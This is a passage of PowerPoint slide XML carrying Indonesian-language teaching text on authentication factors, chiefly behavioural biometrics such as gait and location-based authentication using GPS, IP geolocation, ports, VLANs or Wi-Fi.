              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seseorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direkam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>templat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>templat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Faktor Di Mana Saja Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berada</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>"Di mana pun Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>statistik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet (IP). Alamat IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditautkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geolokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, LAN virtual (VLAN), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijadikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di negara yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diharapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
